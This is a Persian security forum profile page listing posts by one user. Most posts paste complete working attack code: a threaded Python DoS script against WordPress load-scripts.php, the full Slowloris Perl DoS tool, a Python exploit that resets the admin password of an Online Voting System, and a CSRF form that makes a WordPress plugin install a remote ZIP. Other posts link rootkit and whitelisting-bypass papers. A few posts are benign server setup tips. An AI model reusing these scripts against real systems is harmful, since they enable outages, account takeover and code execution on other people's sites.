رفتن به مطلب
شما به عنوان یوزر میهمان وارد شده اید. جهت استفاده از تمامی امکانات لطقا وارد حساب کاربری خود شوید.

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

n4ss1m

New Member
  • تعداد ارسال ها

    19
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

1 دنبال کننده

درباره n4ss1m

  • تاریخ تولد ۹۴/۱۲/۰۹

Converted

  • Name
    n4ss1m
  • Main os
    Linux
  • Programming language
    خیر
  1. n4ss1m

    Wordpress Core - Load-scripts.php Denial Of Service Exploit

    WordPress Core - load-scripts.php Denial of Service Exploit https://www.exploit-db.com/exploits/43968/ https://0days.info/?exp=2458807 # EDB Note: python doser.py -g 'http://localhost/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999 import requests import sys import threading import random import re import argparse host='' headers_useragents=[] request_counter=0 printedMsgs = [] def printMsg(msg): if msg not in printedMsgs: print "\n"+msg + " after %i requests" % request_counter printedMsgs.append(msg) def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') return(headers_useragents) def randomString(size): out_str = '' for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def initHeaders(): useragent_list() global headers_useragents, additionalHeaders headers = { 'User-Agent': random.choice(headers_useragents), 'Cache-Control': 'no-cache', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Referer': "http://www.google.com/?q=" + randomString(random.randint(5,10)), 'Keep-Alive': random.randint(110,120), 'Connection': 'keep-alive' } if additionalHeaders: for header in additionalHeaders: headers.update({header.split(":")[0]:header.split(":")[1]}) return headers def handleStatusCodes(status_code): global request_counter sys.stdout.write("\rNumber of requests sent %i" % request_counter) sys.stdout.flush() if status_code == 429: printMsg("You have been throttled") if status_code == 500: printedMsg("Status code 500 received") def sendGET(url): global request_counter headers = initHeaders() try: request_counter+=1 request = requests.get(url, headers=headers) handleStatusCodes(request.status_code) except e: pass def sendPOST(url, payload): global request_counter headers = initHeaders() try: request_counter+=1 if payload: request = requests.post(url, data=payload, headers=headers) else: request = requests.post(url, headers=headers) handleStatusCodes(request.status_code) except e: pass class SendGETThread(threading.Thread): def run(self): try: while True: global url sendGET(url) except: pass class SendPOSTThread(threading.Thread): def run(self): try: while True: global url, payload sendPOST(url, payload) except: pass # TODO: # check if the site stop responding and alert def main(argv): parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily') parser.add_argument('-g', help='Specify GET request. Usage: -g \'<url>\'') parser.add_argument('-p', help='Specify POST request. Usage: -p \'<url>\'') parser.add_argument('-d', help='Specify data payload for POST request', default=None) parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*') parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int) args = parser.parse_args() global url, payload, additionalHeaders additionalHeaders = args.ah payload = args.d if args.g: url = args.g for i in range(args.t): t = SendGETThread() t.start() if args.p: url = args.p for i in range(args.t): t = SendPOSTThread() t.start() if len(sys.argv)==1: parser.print_help() exit() if __name__ == "__main__": main(sys.argv[1:])
  2. n4ss1m

    Online Voting System - Authentication Bypass

    Online Voting System - Authentication Bypass vulnerability # Exploit Title: Online Voting System - Authentication Bypass # Date: 02.02.2018 # Vendor Homepage: http://themashabrand.com # Software Link: http://themashabrand.com/p/votin # Demo: http://localhost/Onlinevoting # Version: 1.0 # Category: Webapps # Exploit Author: Giulio Comi # CVE : CVE-2018-6180 #Description A flaw in the profile section of Online Voting System allows an unauthenticated user to set an arbitrary password for accounts registered in the application. The application does not check the validity of the session cookie and updates the password and other fields of a user based on an incremental identifier and without requiring the current valid password for target account. # Proof of Concept: #!/usr/bin/env python import requests from time import sleep from lxml import html def own(auth_bypass_request): """ Reset the password of a user just knowing his id """ url_edit_password = "admin/profile.php" payload = { 'id': 1, 'admin': 'admin', # overwrite the username of the victim 'password': "ARBITRARY_PASSWORD", # overwrite the password of the victim 'edit': '' } response = auth_bypass_request.post(target_site + url_edit_password, data=payload) # Parse response to check if the request was successful check_result = html.fromstring(response).xpath('//div[@class="alert alert-success"]//p//strong/text()') return(lambda: False, lambda: True)[str(check_result).find('Successfully') > -1]() def login(login_request): """ Enjoy the new password chosen for the victim """ credentials = {'username': 'admin', 'password': "ARBITRARY_PASSWORD", 'usertype': 'admin', 'login': '' } response = login_request.post(target_site, data=credentials) print(response.text) if __name__ == "__main__": target_site = "http://localhost/Onlinevoting/" request = requests.Session() if own(request): sleep(4) # just a bit of delay login(request) else: print('Maybe the given id is not registered in the application')
  3. سلام , Exploit رو قرار میدید ؟ :kolah
  4. WordPress Download Manager [CSRF] https://www.exploit-db.com/exploits/43487 https://0days.info/?exp=3333541 * Exploit Title: WordPress Download Manager [CSRF] * Discovery Date: 2017-12-12 * Exploit Author: Panagiotis Vagenas * Author Link: https://twitter.com/panVagenas * Vendor Homepage: https://www.wpdownloadmanager.com/ * Software Link: https://wordpress.org/plugins/download-manager * Version: 2.9.60 * Tested on: WordPress 4.9.1 * Category: WebApps, WordPress Description ----------- Plugin implements the AJAX action `wpdm-install-addon` which calls the function `wpdm_install_addon`. This function doesn't take any anti-CSRF measures thus making it susceptible to those kind of attacks. What is interesting about this function though, is the fact that it provides plugin installation functionality for admin users. The origin of the package is defined by the `$_REQUEST['addon']` if is set without any validation. A malicious actor can exploit this to install a malicious plugin in the vulnerable site. In fact the install package doesn't need to be a valid plugin, it could just contain malicious code. Because the package is extracted in the `/wp-content/plugins/` dir without changing it's original folder structure, an attacker could leverage the CSRF to upload malicious code and execute the code on the infected server. PoC --- ``` <pre class="lang:html decode:true "><form method="post" action="http://vuln.dev/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="wpdm-install-addon"> <label> This is the remote url to get plugin from. Everything is valid as long as it's a ZIP archive and ends with .zip <input type="text" name="addon" value="https://downloads.wordpress.org/plugin/bbpress.2.5.13.zip"> </label> <button type="submit" value="Submit">Submit</button> </form> ``` Solution -------- Update to version 2.9.61. Timeline -------- 1. **2017-12-12**: Discovered 2. **2017-12-14**: Tried to reach out to vendor using support email address 3. **2017-12-16**: Vendor replied 4. **2017-12-16**: Vendor received details 5. **2017-12-21**: Vendor released a fix
  5. به به دختر همیشه انلاین چطوری سراغ نمیگیری
  6. تبدیل 2 سیستم عامل مجازی به شبکه در Virtualbox سلام خدمت دوستان عزیز , در این ویدئو شما با نحوه تبدیل سیستم عامل های مجازی در Virtualbox به شبکه آشنا خواهید شد . زبان : English Language: English virtualbox.part1.rar virtualbox.part3.rar
  7. Slowloris HTTP Dos Script #!/usr/bin/perl -w use strict; use IO::Socket::INET; use IO::Socket::SSL; use Getopt::Long; use Config; $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors print <<EOTEXT; Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris EOTEXT my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections ); my ( $cache, $httpready, $method, $ssl, $rand, $tcpto ); my $result = GetOptions( 'shost=s' => \$shost, 'dns=s' => \$host, 'httpready' => \$httpready, 'num=i' => \$connections, 'cache' => \$cache, 'port=i' => \$port, 'https' => \$ssl, 'tcpto=i' => \$tcpto, 'test' => \$test, 'timeout=i' => \$timeout, 'version' => \$version, ); if ($version) { print "Version 0.7\n"; exit; } unless ($host) { print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n"; print "\n\tType 'perldoc $0' for help with options.\n\n"; exit; } unless ($port) { $port = 80; print "Defaulting to port 80.\n"; } unless ($tcpto) { $tcpto = 5; print "Defaulting to a 5 second tcp connection timeout.\n"; } unless ($test) { unless ($timeout) { $timeout = 100; print "Defaulting to a 100 second re-try timeout.\n"; } unless ($connections) { $connections = 1000; print "Defaulting to 1000 connections.\n"; } } my $usemultithreading = 0; if ( $Config{usethreads} ) { print "Multithreading enabled.\n"; $usemultithreading = 1; use threads; use threads::shared; } else { print "No multithreading capabilites found!\n"; print "Slowloris will be slower than normal as a result.\n"; } my $packetcount : shared = 0; my $failed : shared = 0; my $connectioncount : shared = 0; srand() if ($cache); if ($shost) { $sendhost = $shost; } else { $sendhost = $host; } if ($httpready) { $method = "POST"; } else { $method = "GET"; } if ($test) { my @times = ( "2", "30", "90", "240", "500" ); my $totaltime = 0; foreach (@times) { $totaltime = $totaltime + $_; } $totaltime = $totaltime / 60; print "This test could take up to $totaltime minutes.\n"; my $delay = 0; my $working = 0; my $sock; if ($ssl) { if ( $sock = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } else { if ( $sock = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working = 1; } } if ($working) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "GET /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; if ( print $sock $primarypayload ) { print "Connection successful, now comes the waiting game...\n"; } else { print "That's odd - I connected but couldn't send the data to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } } else { print "Uhm... I can't connect to $host:$port.\n"; print "Is something wrong?\nDying.\n"; exit; } for ( my $i = 0 ; $i <= $#times ; $i++ ) { print "Trying a $times[$i] second delay: \n"; sleep( $times[$i] ); if ( print $sock "X-a: b\r\n" ) { print "\tWorked.\n"; $delay = $times[$i]; } else { if ( $SIG{__WARN__} ) { $delay = $times[ $i - 1 ]; last; } print "\tFailed after $times[$i] seconds.\n"; } } if ( print $sock "Connection: Close\r\n\r\n" ) { print "Okay that's enough time. Slowloris closed the socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } else { print "Remote server closed socket.\n"; print "Use $delay seconds for -timeout.\n"; exit; } if ( $delay < 166 ) { print <<EOSUCKS2BU; Since the timeout ended up being so small ($delay seconds) and it generally takes between 200-500 threads for most servers and assuming any latency at all... you might have trouble using Slowloris against this target. You can tweak the -timeout flag down to less than 10 seconds but it still may not build the sockets in time. EOSUCKS2BU } } else { print "Connecting to $host:$port every $timeout seconds with $connections sockets:\n"; if ($usemultithreading) { domultithreading($connections); } else { doconnections( $connections, $usemultithreading ); } } sub doconnections { my ( $num, $usemultithreading ) = @_; my ( @first, @sock, @working ); my $failedconnections = 0; $working[$_] = 0 foreach ( 1 .. $num ); #initializing $first[$_] = 0 foreach ( 1 .. $num ); #initializing while (1) { $failedconnections = 0; print "\t\tBuilding sockets.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 0 ) { if ($ssl) { if ( $sock[$z] = new IO::Socket::SSL( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; } else { $working[$z] = 0; } } else { if ( $sock[$z] = new IO::Socket::INET( PeerAddr => "$host", PeerPort => "$port", Timeout => "$tcpto", Proto => "tcp", ) ) { $working[$z] = 1; $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK } else { $working[$z] = 0; } } if ( $working[$z] == 1 ) { if ($cache) { $rand = "?" . int( rand(99999999999999) ); } else { $rand = ""; } my $primarypayload = "$method /$rand HTTP/1.1\r\n" . "Host: $sendhost\r\n" . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n" . "Content-Length: 42\r\n"; my $handle = $sock[$z]; if ($handle) { print $handle "$primarypayload"; if ( $SIG{__WARN__} ) { $working[$z] = 0; close $handle; $failed++; $failedconnections++; } else { $packetcount++; $working[$z] = 1; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } else { $working[$z] = 0; $failed++; $failedconnections++; } } } print "\t\tSending data.\n"; foreach my $z ( 1 .. $num ) { if ( $working[$z] == 1 ) { if ( $sock[$z] ) { my $handle = $sock[$z]; if ( print $handle "X-a: b\r\n" ) { $working[$z] = 1; $packetcount++; } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } else { $working[$z] = 0; #debugging info $failed++; $failedconnections++; } } } print "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n"; sleep($timeout); } } sub domultithreading { my ($num) = @_; my @thrs; my $i = 0; my $connectionsperthread = 50; while ( $i < $num ) { $thrs[$i] = threads->create( \&doconnections, $connectionsperthread, 1 ); $i += $connectionsperthread; } my @threadslist = threads->list(); while ( $#threadslist > 0 ) { $failed = 0; } } __END__ =head1 TITLE Slowloris by llaera =head1 VERSION Version 1.0 Stable =head1 DATE 02/11/2013 =head1 AUTHOR Laera Loris [email protected] =head1 ABSTRACT Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons. =head1 AFFECTS Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...? =head1 NOT AFFECTED IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
  8. n4ss1m

    Target Trainings

    سوال هاتون رو باید درقسمت سوال و جواب مطرح کنید , اما راهنماییتون میکنم ... این سایت hex رو به رشته تبدیل میکند , اما شما باید پسورد بدست اورده شده در بالارو که بصورت md5 هست کرک کنید ...
  9. n4ss1m

    Target Trainings

    پسورد رو همانطور که داخل عکس هست وارد میکنید ؟ یعنی بصورت hash ؟؟ پسورد بدست امده باید رمزگشایی شود ...
  10. نصب memcached و Module php Memcache در سرور سلام خدمت دوستان , Memcached بر روی سرور کاربرد زیادی مثل کاهش فشار بر روی سرور دارد. در واقع MamCached برای سایت های بزرگ و با دیتابیس حجیم هستند که کوئری های دیتابیس را در رم سرور کش و ذخیره میکند و باعث میشه سایت سریع تر لود بشه ! ابتدا دستور زیررا اجرا کنید : yum install memcache و نصب Module Php mamcache : yum install php php-pecl-memcached ریستارت وبسرور : /etc/init.d/httpd restart ## OR ## service httpd restart memcached تاثیر بسیر بالایی در استفاده از سرور های جداگانه ( سرور مخصوص کش) دارد و بازده بسیار بالایی دارد برای استفاده بصورت سرورجداگانه باید پورت 11211 باز باشد . برای اینکار اگر از csf استفاده میکنید tcp input پورت 11211 باز کنید و در Iptables ها هم : ادیت میکنیم : nano -w /etc/sysconfig/iptables اضافه میکنیم : -A INPUT -m state --state NEW -m tcp -p tcp --dport 11211 -j ACCEPT ریستارت Iptables : service iptables restart ## OR ## /etc/init.d/iptables restart
  11. Bypassing McAfee’s Application Whitelisting for Critical Infrastructure Systems : Contents Abstract Introduction Bypassing code execution protection Bypassing write and read protection Kernel driver vulnerabilities Conclusion ... Bypassing McAfee’s Application Whitelisting for Critical Infrastructure Systems.rar
  12. cPanel Username lookup #!/usr/bin/perl ############################################# # By c0der; dallas-network.com ########################################### use LWP::Simple; print " **************************************************** * cPanel Username look up * **************************************************** * by c0der for 13 [email protected] * ****************************************************"; print "\n\nIP to look up -> "; chomp ($ip = <>); print "Output -> "; chomp ($out = <>); print "\n[~] Downloading Data ....\n"; sleep(1); $URL = "http://www.dedicatedornot.com/xml/".$ip; $content = get($URL); @name = split(/<sites>/,$content); $name = @name[1]; @name = split(/<\/sites>/,$name); $name = @name[0]; $name =~ s/<site>//g; $name =~ s/<\/site>//g; $name =~ s/www.//g; $name =~ s/^.com//g; $name =~ s/^\s+//g; open(IP,">ip.txt"); print IP "$name"; close(IP); sleep(1); print "[~] Parsing Data ...\n"; chomp ($data_file = "ip.txt"); sleep(1); open(DAT, $data_file) || die("Could not open file!"); @raw_data=<DAT>; foreach $res (@raw_data) { chomp($res); $line=$res; my $new_line = substr( $line, 0,10); #my $new_line=$line; $new_line =~ s/\.//g; $new_line =~ s/^\s+//g; open(DA, ">>$out") || print "Can't Open File. Try chmod 777 directory<br><br>"; print DA "$new_line\n"; close(DA); } open(add,">>$out");print add "Tnx to 13";close(add); print "[~] Done .\n"
  13. n4ss1m

    Writing Cisco Ios Rootkits

    Writing Cisco IOS Rootkits Writing Cisco IOS Rootkits.rar

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...